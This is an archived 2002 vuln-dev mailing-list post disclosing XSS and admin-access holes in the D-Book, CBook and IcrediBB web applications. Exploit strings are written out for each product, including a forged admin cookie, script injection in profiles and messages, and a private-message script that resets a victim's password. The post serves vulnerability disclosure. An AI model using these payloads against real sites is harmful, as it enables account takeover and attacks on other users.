Security holes : D-Book, CBook, IcrediBB
From: frog frog (leseulfrog@hotmail.com) Date: 04/12/02
Date: 12 Apr 2002 12:09:53 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com
Product 1 :
D-Book
http://www.smartbb.net
Versions :
1.4 (and earlier?)
Problems :
- XSS
- Admin access
Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php
More details in French:
http://www.ifrance.com/kitetoua/tuto/D-Book.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-Book.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
****************************************
Product 2 :
CBook
Versions :
1.0.1 beta
Problems :
- XSS
- Access to an admin function (delete all entries)
Exploits :
- <script>ANYSCRIPT</script> in the profile
- http://www.site.com/index.php?Change=2
More details in French:
http://www.ifrance.com/kitetoua/tuto/Cbook.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com
Versions :
1.1 beta
Problems :
- Access to user/admin accounts
- XSS
Exploits :
- To change the password, in a private message:
<sc*ript>
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
</s*cript>
(without the '*')
- In the subject (private message):
<script>ANYSCRIPT</script>
- In the web browser:
/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('hello')&message=MESSAGE&submitpm=Submit PM
/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:window.open('http:%2F%2Fwww.url.com')&message=MESSAGE&submitpm=Submit PM
/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B&message=MESSAGE&submitpm=Submit PM
- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)
More details in French:
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
**************************************************
frog-m@n